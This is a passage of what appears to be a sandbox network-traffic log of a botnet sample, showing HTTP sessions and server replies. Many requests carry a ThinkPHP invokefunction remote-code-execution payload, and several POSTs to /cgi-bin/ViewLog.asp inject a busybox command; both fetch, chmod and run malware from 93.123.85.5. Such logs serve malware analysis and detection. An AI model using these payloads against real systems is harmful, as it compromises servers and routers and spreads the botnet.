                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:18.739847898 CET17255INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 258
                                                              Expires: Mon, 13 Nov 2023 21:20:18 GMT
                                                              Date: Mon, 13 Nov 2023 21:20:18 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 64 37 61 37 62 35 63 26 23 34 36 3b 31 36 39 39 39 31 30 34 31 38 26 23 34 36 3b 31 31 64 30 36 39 30 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;bd7a7b5c&#46;1699910418&#46;11d0690b</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              888192.168.2.236043495.210.63.5680
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:18.443244934 CET17172OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:19.387994051 CET17299INHTTP/1.0 400 Bad Request
                                                              Content-Type: text/html
                                                              Content-Length: 349
                                                              Connection: close
                                                              Date: Mon, 13 Nov 2023 21:20:18 GMT
                                                              Server: lighttpd/1.4.48
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              889192.168.2.233976695.217.244.22280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:18.484000921 CET17176OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:18.802335024 CET17275INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/plain; charset=utf-8
                                                              Connection: close
                                                              Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                              Data Ascii: 400 Bad Request


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              89192.168.2.234987488.198.152.17780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:22.572118044 CET2831OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:22.876629114 CET2937INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:18:22 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Content-Length: 150
                                                              Connection: close
                                                              X-Frame-Options: SAMEORIGIN
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              890192.168.2.234939695.57.128.1648080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:18.770819902 CET17273OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              891192.168.2.235298895.161.238.16880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:18.775284052 CET17274OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              892192.168.2.233779295.106.209.5280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:18.805823088 CET17276OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:19.171637058 CET17295INHTTP/1.1 505 HTTP Version not supported
                                                              Content-Type: text/html; charset=utf-8
                                                              Content-Length: 140
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <html><head><title>505 HTTP Version not supported</title></head><body><center><h1>505 HTTP Version not supported</h1></center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              893192.168.2.234145895.100.208.25080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:18.870609045 CET17277OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:19.300647974 CET17298INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 258
                                                              Expires: Mon, 13 Nov 2023 21:20:19 GMT
                                                              Date: Mon, 13 Nov 2023 21:20:19 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 31 63 39 31 30 30 32 26 23 34 36 3b 31 36 39 39 39 31 30 34 31 39 26 23 34 36 3b 37 30 39 65 36 37 31 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;51c91002&#46;1699910419&#46;709e6710</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              894192.168.2.234768895.100.251.16380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:19.423732996 CET17300OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:19.736001968 CET17331INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 258
                                                              Expires: Mon, 13 Nov 2023 21:20:19 GMT
                                                              Date: Mon, 13 Nov 2023 21:20:19 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 36 37 65 31 39 62 38 26 23 34 36 3b 31 36 39 39 39 31 30 34 31 39 26 23 34 36 3b 32 31 64 63 30 30 65 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;567e19b8&#46;1699910419&#46;21dc00ea</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              895192.168.2.235090895.110.255.21180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:19.434593916 CET17301OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:19.758038044 CET17342INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:20:19 GMT
                                                              Server: Apache
                                                              Content-Length: 226
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              896192.168.2.233758895.244.229.25280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:19.470640898 CET17302OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:19.841214895 CET17344INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:20:19 GMT
                                                              Server: Apache/2.4.38 (Raspbian)
                                                              Content-Length: 310
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 52 61 73 70 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 61 70 72 69 70 6f 72 74 61 2e 6e 73 30 2e 69 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.38 (Raspbian) Server at apriporta.ns0.it Port 80</address></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              89795.57.128.1648080192.168.2.2349420
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:19.525214911 CET17306INHTTP/1.1 400 Bad Request
                                                              Server: micro_httpd
                                                              Cache-Control: no-cache
                                                              Date: Mon, 13 Nov 2023 21:20:19 GMT
                                                              Content-Type: text/html
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              898192.168.2.234678288.150.230.6480
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:21.126247883 CET17471OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:21.415759087 CET17539INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:20:21 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              899192.168.2.235321488.198.162.3980
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:21.141110897 CET17473OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:21.445064068 CET17540INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:20:21 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 150
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              9192.168.2.234241031.136.200.1608080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:01.365178108 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:02.389251947 CET556OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:04.404970884 CET713OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:08.468420029 CET1142OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:16.659353971 CET2103OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
